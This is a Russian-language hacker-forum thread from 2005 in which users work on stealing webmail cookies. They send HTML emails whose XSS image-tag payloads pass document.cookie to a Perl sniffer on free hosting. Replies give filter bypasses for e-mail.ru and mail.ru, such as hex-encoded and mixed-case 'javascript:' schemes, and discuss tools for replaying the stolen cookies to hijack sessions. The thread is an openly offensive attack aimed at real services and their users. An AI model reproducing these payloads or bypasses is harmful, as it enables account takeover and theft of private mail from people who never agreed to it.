Как можно получить куки ?

Discussion in 'Песочница' started by VARVAR, 4 Jun 2005.

  1. VARVAR

    VARVAR New Member

    Joined:
    3 Jun 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Запустил у себя на бесплатном хосте (hut.ru) сниффер на perl. Работает отлично - рефку присылает. Но проблема в том, что не получается пока с куками.

    Понял, что для передачи куков нужно послать письмо в html формате с ява-скриптом:

    <img src="javascript:img = new Image(); img.src = '/cgi-bin/s.jpg?'+document.cookie;">

    В скрипте есть адресс сниффера. Потом с лога сниффера забираем файлы куки, а дальше работаем с
    проксомитроном (или др. редактором куков).

    Говорят, что снифер на бесплатном хостинге практически бесполезен...Так это или нет ?

    Посоветуйте плиз, где у меня ошибка (можно в приват). Заранее благодарен, так как вижу, что этот вопрос интересует многих.
     
    #1 VARVAR, 4 Jun 2005
    Last edited: 4 Jun 2005
  2. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Фильтры на скрипты, теги, метасимволы.... Поэтому и не работает...=(
     
    #2 PinkPanther, 4 Jun 2005
    Last edited: 4 Jun 2005
  3. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    557
    Likes Received:
    111
    Reputations:
    146
    Почему ? раз работает, значит полезен :)
     
    1 person likes this.
  4. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Почему? Чтото непонял, у тебя что куки скрипту не передаются
     
  5. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    может быть не работает сам XSS в твоей почте:
    <img src="javascript:">

    Может браузер не поддерживает функц. Image().
    попробуй по-порядку
     
  6. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    но это точно не изза бесплатного хостигна. скорее всего фильтрование со стороны клиента
     
  7. VARVAR

    VARVAR New Member

    Joined:
    3 Jun 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    PinkPanther оказался прав - ява скрипты просто блокируются. Но это можно обойти, используя шестнадцатиричные значения символов вместо javascript. Проверял на e-mail.ru.

    <img src="javascript:img = new Image(); img.src = '/cgi-bin/s.jpg?'+document.cookie;">

    Снифер выдал QUERY=b=b, рефка как и полагается пришла. Получается, что на e-mail.ru нет кукисов, а только одни сессии ?

    На mail.ru такое дело не прокатывает. При вложении в html-код везде добавляется "X", изменяется заголовок.

    <xtitle>Непонятный заголовок</xtitle>
    </xhead>
    <xbody>
    <IMG src=xjavascript:document.images[0].src='/cgi-bin/s.jpg?'+document.cookie;>
    </xbody>
    </xhtml>

    Да, с бесплатным хостом все в порядке ! Разницы вроде нет платный-бесплатный.

    Надо думать дальше насчет куков. Видимо надо пробовать вложения с рисунками и flash.
     
    #7 VARVAR, 4 Jun 2005
    Last edited: 4 Jun 2005
  8. Xattab

    Xattab Elder - Старейшина

    Joined:
    30 May 2005
    Messages:
    37
    Likes Received:
    2
    Reputations:
    2
    /showthread.php?p=43322
    Здесь Майор писал рабочий на данный момент способ обхода фильтра для mail.ru.
    В твоем случае это выглядит так:
    <image src=JaVaScRiPt:document.images[0].src="/cgi-bin/s.jpg?"+document.cookie;>
     
    #8 Xattab, 4 Jun 2005
    Last edited: 4 Jun 2005
  9. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    557
    Likes Received:
    111
    Reputations:
    146
    ты прав
     
  10. VARVAR

    VARVAR New Member

    Joined:
    3 Jun 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Thank you Майор & Xattab !

    Интересно, а кто-нибудь юзал прогу Minibrowser v2.20 для подстановки куков. Очень интересная прога ! За исключением того, что не хочет открывать папки на mail.ru. На рамблере без проблем.

    В принципе и Opera рулит, но не очень удобно делать подстановку снифф-куки.